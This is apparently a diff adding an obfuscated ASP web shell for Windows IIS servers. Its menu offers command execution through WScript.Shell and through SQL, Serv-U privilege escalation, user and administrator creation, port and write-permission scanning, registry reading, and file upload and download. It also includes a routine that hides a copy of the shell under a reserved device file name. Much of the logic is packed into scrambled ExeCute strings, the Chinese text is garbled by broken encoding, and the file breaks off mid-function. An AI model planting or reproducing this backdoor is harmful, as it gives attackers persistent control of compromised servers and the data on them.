+RRS"<tr><td width='40' align='left'>��ַ��</td><td>"
+RRS"<input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'>"
+RRS"</td><td width='70' align='center'><input name='Submit' type='submit' value='GOGO'>" 
+RRS"</td></tr></form></table>"
+RRS"<table width='100%' height='96%' style='border:1px solid #008000;' cellpadding='0' cellspacing='0'>"
+RRS"<td width='135' id=tl>"
+RRS"<iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td>"
+RRS"<td width=1 style='background:#008000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#008000'><td>"
+RRS"<iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='0'></iframe>"
+End Function:Function MainMenu()
+RRS"<table width='100%' cellspacing='0' cellpadding='0'>"
+RRS"<tr><td><hr hight=1 width='100%'>"
+RRS"</td></tr>"
+If soT(0,1)=" ��" Then
+RRS"<tr><td height='24'>��Ȩ��</td></tr>"
+Else
+Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing
+RRS"<tr><td height='20'> <a href='javascript:ShowFolder("""&RePath(WWWRoot)&""")'>��վ��Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&RePath(RootPath)&""")'>������Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=goback' target='FileFrame'>���ϼ�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='javascript:FullForm("""&RePath(Session("FolderPath")&"\NewFolder")&""",""NewFolder"")'>���½�Ŀ¼</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=EditFile' target='FileFrame'>���½��ı�</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=downloads' target='FileFrame'>��Զ������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=UpFile' target='FileFrame'>���ϴ��ļ�</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanDriveForm' target='FileFrame'>����дĿ¼</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸�Ȩ��</font></a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����ش���</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq1' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq2' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq3' target='FileFrame'><font color=red>��N��������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq4' target='FileFrame'><font color=red>������������Ȩ����</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=fuzhutq5' target='FileFrame'><font color=red>��ɨĿ¼��д��D��</a></font><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Course' target='FileFrame'>���û��˺�</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd2' target='FileFrame'>��Cmd2</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=suftp' target='FileFrame'>��Serv-u Ftp��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu7x' target='FileFrame'>��Serv-u7x��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+Sub ScanDriveForm() 
+    Dim FSO,DriveB
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgColor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD colspan=5 >����/ϵͳ�ļ�����Ϣ</TD>"
+Response.Write "  </TR>"
+
+
+  For Each DriveB in FSO.Drives
+
+Response.Write "  </TR>"
+Next
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>Windows�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(0)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>System32�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(1)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <FORM action="
+Response.Write "?Action=ScFolder&Folder="
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write " method=Post>		  "
+Response.Write "	<TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD>"
+Response.Write "	<TD colspan=3>"
+Response.Write FSO.GetSpecialFolder(2)
+Response.Write "</TD>"
+Response.Write "	<TD align=middle><INPUT type=submit value=��ϸ����></TD>"
+Response.Write "	</FORM>"
+Response.Write "  </TR>"
+Response.Write "</TABLE><BR>"
+Response.Write "<DIV align=center>"
+Response.Write "<b>��ǰ��վ����·��:"&Server.MapPath("/")&"</b>"
+Response.Write "  <FORM Action="
+Response.Write "?Action=ScFolder method=Post>ָ���ļ��в�ѯ��"
+Response.Write "    <INPUT type=text name=Folder>"
+Response.Write "	<INPUT type=submit value=���ɱ���>Wָ���ļ���·��b�磺F:\ASP\"
+Response.Write "  </FORM>"
+Response.Write "<DIV>"
+	Set FSO=Nothing
+End Sub
+
+Sub ScanDrive(Drive) 
+    Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+	If Drive <> "" Then
+	    Set FSO = Server.Createobject("Scripting.FileSystemObject")
+		Set TestDrive = FSO.GetDrive(Drive)
+		If TestDrive.IsReady Then
+		    Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(GetTheSize(TestDrive.TotalSize)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+
+			Set BaseFolder = TestDrive.RootFolder
+			Set TempFolders = BaseFolder.SubFolders
+			For Each D in TempFolders
+			    Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+			Next
+			Set TempFolder = Nothing
+			Set BaseFolder = Nothing
+	    Else
+		    Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+			Dim TempFolderList,t
+			t=0
+			Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+			TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+			For i = 0 to Ubound(TempFolderList)
+			    If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+				    t = t+1
+					Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+			    End if
+		    Next
+			If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+	    End if
+		Set TestDrive = Nothing
+	    Set FSO = Nothing
+		Temp_Str = Temp_Str & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+		Message Drive & ":������Ϣ",Temp_Str,1
+	End if
+End Sub
+
+Sub ScFolder(folder) 
+    On Error Resume Next
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	If FSO.FolderExists(folder) Then
+	    Set OFolder = FSO.GetFolder(folder)
+		Set TempFolders = OFolder.SubFolders
+		Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+		For Each S in TempFolders
+		     Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S)  
+		Next
+		Set TempFolders = Nothing
+		Set OFolder = Nothing
+	Else
+	    Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<LI>ע�⣺" & Red("��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!")
+	Set FSO = Nothing
+	Message "�ļ�����Ϣ",Scmsg,1
+End Sub
+
+Function ScReWr(folder):
+ On Error Resume Next
+   Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+   Set FSO = Server.Createobject("Scripting.FileSystemObject")
+   Set TestFolder = FSO.GetFolder(folder)
+   Set TestFileList = TestFolder.SubFolders
+   RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+   For Each A in TestFileList
+   Next
+   If err Then
+       err.Clear
+	   ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дq</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дq</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End If
+   Else
+       ReWrStr = folder & "<FONT color=#ff2222> �ɶ�,"
+	   FSO.CreateTextFile folder & RndFilename,True
+	   If err Then
+	       err.Clear
+		   ReWrStr = ReWrStr & "����дY</FONT>"
+	   Else
+	       ReWrStr = ReWrStr & "��дY</FONT>"
+		   FSO.DeleteFile folder & RndFilename,True
+	   End if
+   End if
+   Set TestFileList = Nothing
+   Set TestFolder = Nothing
+   Set FSO = Nothing
+   ScReWr = ReWrStr
+End Function
+
+Sub Message(state,msg,flag)
+Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#fff>"
+Response.Write "  <TR>"
+Response.Write "    <TD >ϵͳ��Ϣ</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD align=middle bgcolor=#ecfccd>"
+Response.Write "	  <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
+Response.Write "	    <TR>"
+Response.Write "		  <TD><FONT color=red>"
+Response.Write state
+Response.Write "</FONT></TD>"
+Response.Write "		<TR>"
+Response.Write "		  <TD><P>"
+Response.Write msg
+Response.Write "</P></TD>"
+Response.Write "		</TR>"
+Response.Write "	  </TABLE>"
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "  <TR>"
+Response.Write "    <TD class=TBEnd>"
+Response.Write "	"
+If flag=0 Then
+Response.Write "	      <INPUT type=button value=�ر� onclick=""window.close();"">"
+Response.Write "	"
+Else
+Response.Write "	      <INPUT type=button value=���� onClick=""history.go(-1);"">"
+Response.Write "	"
+End if
+Response.Write "	</TD>"
+Response.Write "  </TR>"
+Response.Write "</TABLE>"
+End Sub
+Function Red(str):Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub
+
+
+Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:
+Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+RRS ""&copyurl&""
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\Av.asp")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t 